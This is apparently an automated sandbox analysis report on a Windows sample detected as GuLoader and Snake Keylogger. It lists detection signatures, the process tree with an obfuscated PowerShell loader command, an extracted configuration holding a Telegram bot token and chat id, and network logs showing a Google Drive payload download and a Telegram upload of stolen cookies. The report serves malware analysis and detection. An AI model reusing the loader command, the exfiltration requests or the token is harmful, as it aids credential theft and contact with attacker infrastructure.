
Windows Analysis Report
rAntephialtic.exe

Overview

General Information

Sample name: rAntephialtic.exe
Analysis ID: 1620273
MD5: 65249febec3f7bde1c51b92ff5d3c4a7
SHA1: 459c11b637dc859eacea6d65489729f7b32fbf27
SHA256: f9d051b1d729d3a1689e7b1454902012a5d757f5b5339db346ffcead746802f6
Tags: exe, user-Porcupine

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • rAntephialtic.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\rAntephialtic.exe" MD5: 65249FEBEC3F7BDE1C51B92FF5D3C4A7)
    • powershell.exe (PID: 7700 cmdline: "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 8180 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU", "Chat_id": "8187594209", "Version": "4.4"}
Source | Rule | Description | Author
00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000006.00000002.2558138839.0000000025871000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000003.00000002.1830778551.000000000CF10000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: msiexec.exe PID: 8180 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

          System Summary

          Source: Network Connection | Author: frack113 | Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8180, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49975
          Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7700, TargetFilename: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exe
          Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)", CommandLine: "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rAntephialtic.exe", ParentImage: C:\Users\user\Desktop\rAntephialtic.exe, ParentProcessId: 7568, ParentProcessName: rAntephialtic.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)", ProcessId: 7700, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-20T20:02:33.190660+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49979 | 104.21.32.1 | 443 | TCP
2025-02-20T20:02:37.130720+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49985 | 104.21.32.1 | 443 | TCP
2025-02-20T20:02:38.434124+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49987 | 104.21.32.1 | 443 | TCP
2025-02-20T20:02:41.150543+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49991 | 104.21.32.1 | 443 | TCP
2025-02-20T20:02:31.147629+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49977 | 132.226.247.73 | 80 | TCP
2025-02-20T20:02:32.600834+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49977 | 132.226.247.73 | 80 | TCP
2025-02-20T20:02:34.085155+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49980 | 132.226.247.73 | 80 | TCP
2025-02-20T20:02:26.278155+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49975 | 142.250.184.238 | 443 | TCP
2025-02-20T20:02:50.061631+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.7 | 49995 | 149.154.167.220 | 443 | TCP
2025-02-20T20:02:43.485069+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.7 | 49994 | 149.154.167.220 | 443 | TCP


          AV Detection

          Source: 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU", "Chat_id": "8187594209", "Version": "4.4"}
          Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exe | ReversingLabs: Detection: 21%
          Source: rAntephialtic.exe | ReversingLabs: Detection: 21%
          Source: rAntephialtic.exe | Virustotal: Detection: 26%
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.4% probability

          Location Tracking

          Source: unknown | DNS query: name: reallyfreegeoip.org
          Source: rAntephialtic.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49978 version: TLS 1.0
          Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49975 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.7:49976 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49994 version: TLS 1.2
          Source: rAntephialtic.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_00406739 FindFirstFileW, FindClose | 1_2_00406739
          Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_00405AED GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose | 1_2_00405AED
          Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_00402902 FindFirstFileW | 1_2_00402902
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 025EF45Dh | 6_2_025EF2C0

          Networking

          Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49995 -> 149.154.167.220:443
          Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49994 -> 149.154.167.220:443
          Source: unknown | DNS query: name: api.telegram.org
          Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
          Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2021/02/2025%20/%2004:32:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: POST /bot7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU/sendDocument?chat_id=8187594209&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5298a6722ded | Host: api.telegram.org | Content-Length: 1282
          Source: Joe Sandbox View | IP Address: 149.154.167.220
          Source: Joe Sandbox View | IP Address: 104.21.32.1
          Source: Joe Sandbox View | IP Address: 132.226.247.73
          Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknown | DNS query: name: checkip.dyndns.org
          Source: unknown | DNS query: name: reallyfreegeoip.org
          Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49980 -> 132.226.247.73:80
          Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49977 -> 132.226.247.73:80
          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49979 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49975 -> 142.250.184.238:443
          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49987 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49991 -> 104.21.32.1:443
          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49985 -> 104.21.32.1:443
          Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: drive.google.com | Cache-Control: no-cache
          Source: global traffic | HTTP traffic detected: GET /download?id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic | DNS traffic detected: DNS query: drive.google.com
          Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
          Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
          Source: unknown | HTTP traffic detected: POST /bot7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU/sendDocument?chat_id=8187594209&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5298a6722ded | Host: api.telegram.org | Content-Length: 1282
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 20 Feb 2025 19:02:43 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49975 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.7:49976 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49994 version: TLS 1.2
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405582

          System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exe
Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_00406AFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00F39338
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025ED278
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025E5370
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025EC146
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025EC738
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025EC468
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025ECA08
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025EE988
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025E3E09
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025ECFAA
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_025ECCD8
Source: rAntephialtic.exe | Static PE information: invalid certificate
Source: rAntephialtic.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/30@5/5
Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_004021A2 CoCreateInstance
Source: C:\Users\user\Desktop\rAntephialtic.exe | File created: C:\Users\user\Pictures\downtreading
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\rAntephialtic.exe | File created: C:\Users\user~1\AppData\Local\Temp\nsi403C.tmp
Source: rAntephialtic.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\rAntephialtic.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\rAntephialtic.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: msiexec.exe, 00000006.00000002.2558138839.00000000258F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.000000002591C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.00000000258E9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.0000000025929000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: rAntephialtic.exe | ReversingLabs: Detection: 21%
Source: rAntephialtic.exe | Virustotal: Detection: 26%
Source: C:\Users\user\Desktop\rAntephialtic.exe | File read: C:\Users\user\Desktop\rAntephialtic.exe
Source: unknown | Process created: C:\Users\user\Desktop\rAntephialtic.exe "C:\Users\user\Desktop\rAntephialtic.exe"
Source: C:\Users\user\Desktop\rAntephialtic.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: coremessaging.dll (2 identical entries)
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: wintypes.dll (3 identical entries)
Source: C:\Users\user\Desktop\rAntephialtic.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
